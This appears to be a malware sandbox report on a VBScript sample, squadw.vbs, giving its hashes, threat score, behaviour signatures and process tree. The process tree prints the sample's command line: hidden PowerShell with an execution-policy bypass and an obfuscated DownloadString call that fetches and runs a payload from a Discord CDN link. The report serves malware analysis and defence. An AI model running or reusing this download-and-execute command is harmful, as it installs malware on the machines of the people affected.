Overview

overview

10

Static

static

squadw.vbs

windows7_x64

8

squadw.vbs

windows10_x64

10

Analysis

  • max time kernel
    325s
  • max time network
    325s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    07-10-2021 21:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    squadw.vbs

  • Size

    825B

  • MD5

    fe6492eed50dc9d3d807b03aae535d79

  • SHA1

    bff235e3d137717701b0095eee41582ca7e39c0a

  • SHA256

    80cc399540ed18faa7019f09dd2ac663689fa8ea246209309e9051b5b04110d5

  • SHA512

    31773f3f1839282f0715bb0a2a9ec5da4e3899608fede4546eca8438a479663315d1c5edb66c0bf25f533f061357eaca40018ee85cfb353f967f56dbc27645d8

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\squadw.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/878366592180813876/894630606460301392/Main.png');$results
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:860

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/612-54-0x000007FEFC271000-0x000007FEFC273000-memory.dmp

    Filesize

    8KB

    Download

  • memory/860-55-0x0000000000000000-mapping.dmp

    Download

  • memory/860-57-0x000007FEF2AB0000-0x000007FEF360D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/860-59-0x0000000002952000-0x0000000002954000-memory.dmp

    Filesize

    8KB

    Download

  • memory/860-58-0x0000000002950000-0x0000000002952000-memory.dmp

    Filesize

    8KB

    Download

  • memory/860-60-0x0000000002954000-0x0000000002957000-memory.dmp

    Filesize

    12KB

    Download

  • memory/860-61-0x000000001B700000-0x000000001B9FF000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/860-62-0x000000000295B000-0x000000000297A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/860-63-0x000007FEEE080000-0x000007FEEF116000-memory.dmp

    Filesize

    16.6MB

    Download

  • memory/860-64-0x000000000297A000-0x000000000297C000-memory.dmp

    Filesize

    8KB

    Download